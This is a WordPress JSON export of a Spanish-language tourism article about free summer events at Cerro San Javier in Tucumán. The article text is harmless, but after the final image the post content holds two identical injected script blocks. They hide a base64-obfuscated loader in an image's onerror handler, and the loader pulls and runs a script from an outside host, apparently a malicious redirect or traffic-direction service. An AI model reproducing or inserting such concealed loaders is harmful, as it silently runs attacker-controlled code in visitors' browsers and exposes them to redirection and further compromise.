{"id":3472,"date":"2024-01-04T20:22:17","date_gmt":"2024-01-04T23:22:17","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3472"},"modified":"2025-08-14T00:02:48","modified_gmt":"2025-08-14T03:02:48","slug":"el-cerro-san-javier-invita-a-disfrutar-este-verano-con-recitales-y-shows-de-luces","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3472","title":{"rendered":"El cerro San Javier invita a disfrutar este verano con recitales y shows de luces"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background has-link-color wp-elements-bd3ff2c4c1a3bfb56af7703f5df021d5\"><em>La agenda de actividades del\u00a0Cristo Bendicente, una de las villas tur\u00edsticas m\u00e1s visitadas de Tucum\u00e1n, incluye tambi\u00e9n ferias artesanas y clases de yoga.<\/em><\/h3>\n\n\n\n<p>San Javier, una de las villas tur\u00edsticas m\u00e1s visitadas de Tucum\u00e1n, ubicada a menos de una hora de la capital provincial, ofrece una agenda de actividades gratuitas que incluye espect\u00e1culos de luz y sonidos, recitales, ferias artesanas y clases de yoga, para disfrutar durante las vacaciones de verano.<\/p>\n\n\n\n<p>Durante enero y febrero las actividades, se desarrollar\u00e1n en el Complejo Tur\u00edstico Cristo Bendicente con entrada libre y gratuita, donde se encuentra la escultura del artista tucumano Iramain Juan Carlos Iramain.<\/p>\n\n\n\n<p>Una de las propuestas es el&nbsp;<strong>Espect\u00e1culo de Luz y Sonido \u00abCristo Resplandeciente\u00bb<\/strong>, todos los d\u00edas de enero y febrero con dos funciones, a las 20.30 y a las 21.00.<\/p>\n\n\n\n<p>Para aquellos que disfrutan de la&nbsp;<strong>danza<\/strong>, los viernes de 18 a 20 se pondr\u00e1 en escena \u00abFolklore en el Cristo\u00bb.<\/p>\n\n\n\n<p>Este a\u00f1o se suma una nueva propuesta al calendario de actividades: el llamado<strong>&nbsp;\u00abCiclo de Clases de Yoga, Bienestar y Plenitud en la Naturaleza\u00bb<\/strong>, que ser\u00e1n dictadas todos los s\u00e1bados a partir de las 18.30. Los interesados deber\u00e1n asistir un mat de yoga, agua, ropa c\u00f3moda y repelente.<\/p>\n\n\n\n<p>En tanto, los domingos a partir de las 19 se llevar\u00e1 adelante<strong>&nbsp;\u00abM\u00fasica al Atardecer\u00bb<\/strong>, con diferentes grupos y bandas musicales invitadas para disfrutar la puesta del sol con una inmejorable vista a la ciudad.<\/p>\n\n\n\n<p>Adem\u00e1s de estas propuestas, el Ente de Turismo de la provincia program\u00f3 una jornada de&nbsp;<strong>\u00abCine Familiar\u00bb<\/strong>&nbsp;en la Plaza Manos Unidas, para el viernes 12 de enero.<\/p>\n\n\n\n<p>El s\u00e1bado 13 de enero desde las 20, se realizar\u00e1 una&nbsp;<strong>Pe\u00f1a Folkl\u00f3rica y Tropical&nbsp;<\/strong>con bandas invitadas y locales, en el Complejo Polideportivo de San Javier.<\/p>\n\n\n\n<p>Por \u00faltimo, el s\u00e1bado 27 de enero se desarrollar\u00e1 la tradicional&nbsp;<strong>\u00abJuntada en San Javier\u00bb<\/strong>, un espacio para toda la familia en el que habr\u00e1 espect\u00e1culos musicales, danzas folkl\u00f3ricas, feria de artesanos y emprendedores, talleres de cer\u00e1mica y costura, ecocanje y actividades infantiles.<\/p>\n\n\n\n<p>Como se trata de una actividad al aire libre, se suspender\u00e1 en caso de lluvia, inform\u00f3 el Ente de Turismo.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.telam.com.ar\/notas\/202401\/651445-tucuman-cerro-san-javier-agenda.html\" target=\"_blank\" rel=\"noreferrer noopener\"><img fetchpriority=\"high\" decoding=\"async\" width=\"964\" height=\"96\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/04\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_.jpeg\" alt=\"\" class=\"wp-image-562\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/04\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_.jpeg 964w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/04\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-300x30.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/04\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-768x76.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/04\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-696x69.jpeg 696w\" sizes=\"(max-width: 964px) 100vw, 964px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La agenda de actividades del\u00a0Cristo Bendicente, una de las villas tur\u00edsticas m\u00e1s visitadas de Tucum\u00e1n, incluye tambi\u00e9n ferias artesanas y clases de yoga. San Javier, una de las villas tur\u00edsticas m\u00e1s visitadas de Tucum\u00e1n, ubicada a menos de una hora de la capital provincial, ofrece una agenda de actividades gratuitas que incluye espect\u00e1culos de luz [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3473,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,11],"tags":[],"class_list":{"0":"post-3472","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-datos-utiles"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3472"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3472"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3472\/revisions"}],"predecessor-version":[{"id":6883,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3472\/revisions\/6883"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3473"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3472"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3472"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3472"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}